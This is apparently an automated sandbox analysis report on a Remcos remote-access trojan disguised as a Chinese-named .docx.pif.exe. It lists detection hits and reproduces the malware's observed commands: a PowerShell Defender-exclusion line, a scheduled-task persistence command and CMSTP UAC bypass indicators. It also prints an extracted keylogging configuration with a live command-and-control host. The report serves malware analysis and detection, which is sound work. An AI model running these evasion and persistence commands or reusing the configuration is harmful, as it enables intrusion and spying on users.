0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0xe34c8:$a1: Remcos restarted by watchdog! 0x15bb08:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0xe3a40:$a3: %02i:%02i:%02i:%03i 0x15c080:$a3: %02i:%02i:%02i:%03i
0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdd408:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x155a48:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0xdd39c:$s1: CoGetObject 0xdd3b0:$s1: CoGetObject 0xdd3cc:$s1: CoGetObject 0xe7358:$s1: CoGetObject 0x1559dc:$s1: CoGetObject 0x1559f0:$s1: CoGetObject 0x155a0c:$s1: CoGetObject 0x15f998:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0xdd35c:$s2: Elevation:Administrator!new: 0x15599c:$s2: Elevation:Administrator!new:
10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0x8bec8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0x8c440:$a3: %02i:%02i:%02i:%03i
10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x85e08:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0x85d9c:$s1: CoGetObject 0x85db0:$s1: CoGetObject 0x85dcc:$s1: CoGetObject 0x8fd58:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0x85d5c:$s2: Elevation:Administrator!new:
10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x6aaa8:$a1: Remcos restarted by watchdog! 0xe34c8:$a1: Remcos restarted by watchdog! 0x1048e8:$a1: Remcos restarted by watchdog! 0x6b020:$a3: %02i:%02i:%02i:%03i 0xe3a40:$a3: %02i:%02i:%02i:%03i 0x104e60:$a3: %02i:%02i:%02i:%03i
10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x649e8:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xdd408:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0xfe828:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x6497c:$s1: CoGetObject 0x64990:$s1: CoGetObject 0x649ac:$s1: CoGetObject 0x6e938:$s1: CoGetObject 0xdd39c:$s1: CoGetObject 0xdd3b0:$s1: CoGetObject 0xdd3cc:$s1: CoGetObject 0xe7358:$s1: CoGetObject 0xfe7bc:$s1: CoGetObject 0xfe7d0:$s1: CoGetObject 0xfe7ec:$s1: CoGetObject 0x108778:$s1: CoGetObject 0x6493c:$s2: Elevation:Administrator!new: 0xdd35c:$s2: Elevation:Administrator!new: 0xfe77c:$s2: Elevation:Administrator!new:
10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack	JoeSecurity_Remcos	Yara detected Remcos RAT	Joe Security
10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack	Windows_Trojan_Remcos_b296e965	unknown	unknown	0x1252c8:$a1: Remcos restarted by watchdog! 0x19dce8:$a1: Remcos restarted by watchdog! 0x1bf108:$a1: Remcos restarted by watchdog! 0x125840:$a3: %02i:%02i:%02i:%03i 0x19e260:$a3: %02i:%02i:%02i:%03i 0x1bf680:$a3: %02i:%02i:%02i:%03i
10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack	INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM	Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)	ditekSHen	0x11f208:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x197c28:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x1b9048:$guid1: {3E5FC7F9-9A51-4367-9063-A120244FBEC7} 0x11f19c:$s1: CoGetObject 0x11f1b0:$s1: CoGetObject 0x11f1cc:$s1: CoGetObject 0x129158:$s1: CoGetObject 0x197bbc:$s1: CoGetObject 0x197bd0:$s1: CoGetObject 0x197bec:$s1: CoGetObject 0x1a1b78:$s1: CoGetObject 0x1b8fdc:$s1: CoGetObject 0x1b8ff0:$s1: CoGetObject 0x1b900c:$s1: CoGetObject 0x1c2f98:$s1: CoGetObject 0x11f15c:$s2: Elevation:Administrator!new: 0x197b7c:$s2: Elevation:Administrator!new: 0x1b8f9c:$s2: Elevation:Administrator!new:
Click to see the 45 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ProcessId: 4368, ProcessName: powershell.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Suspicious Add Scheduled Task Parent

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe, ParentImage: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe, ParentProcessId: 2892, ParentProcessName: TkdxROLUOVpK.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpCDF3.tmp", ProcessId: 3292, ProcessName: schtasks.exe

Sigma detected: Suspicious Schtasks From Env Var Folder

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", ProcessId: 6600, ProcessName: schtasks.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ProcessId: 4368, ProcessName: powershell.exe

Persistence and Installation Behavior

Sigma detected: Scheduled temp file as task from temp location

Source: Process started

Author: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe", ParentImage: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ParentProcessId: 3628, ParentProcessName: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\TkdxROLUOVpK" /XML "C:\Users\user\AppData\Local\Temp\tmpBE91.tmp", ProcessId: 6600, ProcessName: schtasks.exe

Stealing of Sensitive Information

Sigma detected: Remcos

Source: Registry Key set

Author: Joe Security: Data: Details: 3A 22 D7 FF B5 88 35 F7 AA 82 64 02 49 D7 0F 80 19 35 91 19 F2 25 CD D7 85 75 A1 85 8A 26 C7 F7 B1 39 D6 07 46 53 8C AA C3 C1 9B 48 71 08 E2 D0 74 99 11 0A 47 06 49 72 0B 5F 36 51 E0 6D EE 7F 6F 69 61 60 16 A1 01 FB 21 62 6E C5 E6 A2 62 A0 30 D1 9B 41 1D B3 B3 F0 DC C7 9B DB E7 96 BD FC C3 C6 E0 7A D5 55 72 CC 19 1E 8B 8B , EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe, ProcessId: 4304, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-5MRRQ3\exepath

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: www.vipguyclassproject2024.space

Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp

Malware Configuration Extractor: Remcos {"Host:Port:Password": "www.vipguyclassproject2024.space:2404:0", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-5MRRQ3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Virustotal: Detection: 60%			Perma Link

Multi AV Scanner detection for submitted file

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe	ReversingLabs: Detection: 65%
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Virustotal: Detection: 60%			Perma Link

Yara detected Remcos RAT

Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4510842027.000000000504B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2107662526.00000000054E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 4304, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\gaban\logs.dat, type: DROPPED

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Joe Sandbox ML: detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00433837 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

15_2_00433837

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

memstr_e6f7eea8-2

Exploits

Yara detected UAC Bypass using CMSTP

Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.381f058.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.#U8f6e#U6905-#U89c4#U683c.docx.pif.exe.37a6638.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3c623e0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3be99c0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.TkdxROLUOVpK.exe.3b2f1a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe PID: 3628, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TkdxROLUOVpK.exe PID: 2892, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vbc.exe PID: 5456, type: MEMORYSTR

Privilege Escalation

Contains functionality to bypass UAC (CMSTPLUA)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_004074FD _wcslen,CoGetObject,

15_2_004074FD

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409253
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	15_2_0041C291
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	15_2_0040C34D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	15_2_00409665
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0044E879 FindFirstFileExA,	15_2_0044E879
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	15_2_0040880C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040783C FindFirstFileW,FindNextFileW,	15_2_0040783C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	15_2_00419AF5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	15_2_0040BB30
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe	Code function: 15_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	15_2_0040BD37

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

15_2_00407C97

Source: C:\Users\user\Desktop\#U8f6e#U6905-#U89c4#U683c.docx.pif.exe	Code function: 4x nop then jmp 0476A92Eh		0_2_0476AC62
Source: C:\Users\user\AppData\Roaming\TkdxROLUOVpK.exe	Code function: 4x nop then jmp 04AE9BBEh		10_2_04AE9EF2

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.vipguyclassproject2024.space

Source: unknown

DNS traffic detected: query: www.vipguyclassproject2024.space replaycode: Name error (3)

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,

15_2_0041B380

Source: global traffic

DNS traffic detected: DNS query: www.vipguyclassproject2024.space

Source: vbc.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2092193357.00000000037A6000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2131352258.0000000003AC6000.00000004.00000800.00020000.00000000.sdmp, vbc.exe, 0000000F.00000002.2106236998.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: #U8f6e#U6905-#U89c4#U683c.docx.pif.exe, 00000000.00000002.2091740507.00000000028D1000.00000004.00000800.00020000.00000000.sdmp, TkdxROLUOVpK.exe, 0000000A.00000002.2127357772.0000000002A61000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to register a low level keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0040A2B8 SetWindowsHookExA 0000000D,0040A2A4,00000000

15_2_0040A2B8

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

15_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_004168C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

15_2_004168C1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

Code function: 15_2_0040B70E OpenClipboard,GetClipboardData,CloseClipboard,

15_2_0040B70E

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe

